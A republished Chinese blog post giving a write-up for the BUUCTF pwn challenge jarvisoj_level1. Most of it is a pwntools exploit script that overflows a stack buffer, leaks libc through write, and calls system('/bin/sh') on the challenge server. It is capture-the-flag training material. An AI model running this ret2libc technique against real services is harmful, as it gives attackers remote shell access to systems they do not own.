[BUUCTF-pwn]——jarvisoj_level1
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——jarvisoj_level1
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——jarvisoj_level1
- 題目地址:https://buuoj.cn/challenges#jarvisoj_level1
第一種直接構造shellcode
writeup
第二種泄露libc進行操作
from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = ELF('/lib/i386-linux-gnu/libc-2.23.so') write_got = elf.got['write'] write_plt = elf.plt['write'] read_got = elf.got['read'] main = elf.symbols['main'] #gdb.attach(p)payload = 'a' * (0x88 + 4) + p32(write_plt) + p32(main) + p32(1) + p32(read_got) + p32(4) p.send(payload) read_addr = u32(p.recv(4)) log.success("read_addr ---->:" + hex(read_addr)) libc = LibcSearcher('read', read_addr) libc_base = read_addr - libc.dump('read')info("libc_base -----> " + hex(libc_base)) sys = libc_base +libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x88 + 4) + p32(sys) + p32(main) + p32(binsh) p.send(payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——jarvisoj_level1的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——pwnabl
- 下一篇: [BUUCTF-pwn]——axb_20